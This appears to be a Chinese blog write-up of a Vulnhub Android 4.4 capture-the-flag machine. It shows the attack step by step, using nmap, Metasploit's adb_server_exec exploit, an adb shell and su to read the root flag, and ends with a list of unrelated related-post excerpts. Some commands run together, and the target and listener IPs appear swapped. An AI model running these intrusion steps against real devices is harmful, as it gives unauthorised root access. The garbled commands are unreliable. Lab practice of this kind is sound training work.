渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!
Android4靶机简介
名称:Android4
操作系统:Android v4.4
标志:/data/root/(在此目录中)
等级:初学者。
下载链接:Android4:https://download.vulnhub.com/android4/Android4.ova
搭建成功的Android平台
知识点
- > 端口扫描和IP发现
- > 使用adb_server_exec攻击端口8080代理
- > 使用ADB连接到设备。
- > 使用metasploit。
- > 特权升级和找到答案
渗透过程
1:获取IP地址
使用命令:arp-scan -l
由此我们可以看到靶机的IP地址:192.168.232.146
2:扫描开放端口
在此扫描中,我们将使用最流行的工具nmap进行全端激进扫描
使用命令:nmap -p- -A 192.168.232.146
由此我确定存在与端口8080相关的某种网页。
没有任何延迟,我打开了网页,但什么也没找到。
大多数人都会确定使用POST方法涉及某种语言篡改。我也尝试过,但没有发现任何有用的东西。
在尝试了一些其他方法(PHP CLI和Dropbear RCE)之后,我发现了一种比较好的方法
关于PHP CLI的漏洞扫描:searchsploit -w php cli(关于searchsploit的使用方法:记一次在实战靶机中使用SearchSploit的总结)
我试过PHP CLI和Dropbear RCE之后发现Dropbear的扫描会得到有用的信息
Android Debug Bridge(adb)是一个多功能的命令行工具,可让您与设备进行通信(关于adb的使用方法:adb使用-详细教程(Awesome Adb))
adb命令可以促进各种设备操作,例如安装和调试应用程序,并且可以访问可用于在设备上运行各种命令的Unix shell。
它是一个客户端 - 服务器程序,包括三个组件
1:发送命令的客户端。客户端在您的开发计算机上运行。您可以通过发出adb命令从命令行终端调用客户端。2:一个守护程序(adbd),它在设备上运行命令。守护程序在每个设备上作为后台进程运行。3:服务器,用于管理客户端和守护程序之间的通信。服务器作为开发计算机上的后台进程运行。
如果您没有安装adb,可以通过sudo apt-get install adb安装它
sudo apt-get install abd
要启动ADB服务器,我们使用了metasploit:
首先:启动metasploit
msfconsole
地端口很可能不接受连接。在这种情况下,我们将默认端口从4444更改为3333
use exploit/android/adb/adb_server_execset RHOST 192.168.232.145set LHOST 192.168.232.146set LPORT 3333exploit
接下来就是需要使用adb
只要上面状态显示“正在连接到设备”,在新的终端窗口上键入命令:
adb connect 192.168.232.146:5555adb shell
我们查看一下密码:
并没有发现什么有用的内容
去defaullt目录:
suidls
在/data目录中,我们找到了一个名为“root”的文件夹
cd /datals
最后一步是成功得到答案:
cd /rootlscat flag.txt
渗透测试靶机搭建_对vulnhub中Android4靶机渗透测试全过程!相关推荐
- mysql内测试连通性命令_怎么使用ping命令进行连通性测试
关于ping命令的作用: ping 命令有助于验证网络层的连通性!一般进行网络故障排除时,可以使用ping 命令向目标计算机或IP地址发送ICMP回显请求,目标计算机会返回回显应答,如果目标计算机不能 ...
- eclipse测试java程序_java-同一项目中的Eclipse junit测试
我非常喜欢Maven约定:同一项目中有一个单独的main和test源树,部署了主代码,而没有部署测试代码. 包的结构可以相同(但不必相同). project src main java // sour ...
- 探索式测试--第六章(实践中的探索式测试)--读书笔记
本书为James Whittaker编写.本书写的是一种比其他任何缺陷都重要的特殊缺陷:即逃过所有各种检测手段而最终存在于发布产品中的缺陷.本书是作者设计"漫游"这个隐喻来指导软件 ...
- isql 测试mysql连接_[libco] 协程库学习,测试连接 mysql
历史原因,一直使用 libev 作为服务底层:异步框架虽然性能比较高,但新人学习和使用门槛非常高,而且串行的逻辑被打散为状态机,这也会严重影响生产效率. 用同步方式实现异步功能,既保证了异步性能优势, ...
- python测试代码运行时间_在Python中准确地测量代码执行时间
Python部落(python.freelycode.com)组织翻译,禁止转载,欢迎转发. 测量代码执行时间是困难的.学习如何消除系统和随机测量误差,并获得更可靠的结果. 我们经常需要测量代码的特定 ...
- 开关电源怎么测试文波_开关电源纹波标准与规范测试说明
电源的纹波测试 以20M示波器带宽为限制标准,电压设为PK-PK(也有测有效值的),去除示波器控头上的夹子与地线(因为这个本身的夹子与地线会形成环路,像一个天线接收杂讯,引入一些不必要的杂讯),使用接 ...
- 计算机课程渗透德育案例 博客,语文教学中的德育渗透(德育案例)【转】
语文教学不仅要让学生获得知识,形成能力,还应该让学生受到思想品德教育.但语文课又不是专门的德育课,不能包罗万象.迎风趋时地说教,而应该根据语文教学科的特点,在教学过程中,抓住时机,见缝插针,有的放矢地 ...
- 测试丢包_入行游戏测试之弱网测试工具
接上次的弱网测试要点,今天我想写一下一些常用的弱网测试工具: 一.谷歌浏览器自带的开发者工具 想起我去年一次短暂的三月份棋牌测试时间,后端是用java,客户端是用json?引擎是cocos? 一不小心 ...
- 视频教程-Kali Linux渗透测试全程课与脚本语言编程系列课程-渗透测试
Kali Linux渗透测试全程课与脚本语言编程系列课程 本人有多年的服务器高级运维与开发经验,擅长计算机与服务器攻防及网络攻防技术!对网络安全领域有持续的关注和研究! 林晓炜 ¥899.00 立即订 ...
最新文章
- 服务部署如何做到高可用?这份“三级跳”秘籍送给你\n
- 直播预告 | 第四范式2021发布会技术分论坛报名开启,6月23日线上见
- 图形学 射线相交算法_计算机图形学中的阴极射线管
- Docker 方式安装 zipkin (linux 、阿里云ECS上安装)
- 安装hadoop集群---resourcemanager和NameNode不在同一台机器上
- Struts2框架基础篇
- Python爬虫基础之Urllib
- 谷歌Keras之父连发两文解析深度学习的局限性与未来
- MT4自带30项指标介绍
- 计算机编程方面的电子书大汇总 阿里云盘
- STC51单片机-实验开发装置仿真-物联网应用系统设计
- adb 连接某个wifi_adb通过wifi连接android设备的方法(根据网络中大神的提示加上自我摸索得到):...
- sklearn.neighbors.KNeighborsClassifier()函数解析(最清晰的解释)
- 华为Mate40/华为Mate40Pro忘记密码怎么解锁激活手机设备已锁定恢复出厂无法解锁账户ID屏幕锁解除刷机方法教程
- g mysql windows_Windows平台配置5.7版本+MySQL数据库服务
- 小学期云效能训练营-Day04
- LR推导及其与SVM的区别
- 排列组合(Java随笔)—全排列
- mac系统使用指南之色色篇
- 支付宝推“移动花卡”:花呗账单延后还
热门文章
- 使用selenium和pyquery爬取京东商品列表
- Linux ubuntu16.04 安装opencv4教程(源码编译)
- 四种保留小数后两位输出方法
- zookeeper可视化工具zkui
- centos7服务器搭建elasticsearch7.6.0集群
- 普罗米修斯笔记:初识Prometheus
- Java并发知识总结,超详细!(下)
- Spring bean注入之注解注入-- @Autowired原理
- python取消任务的方法_python-即使忽略CancelledError,如何取消任务执...
- 模型部署到移动端_Pytorch1.4来了!定制移动端构建、支持分布式模型并行训练等...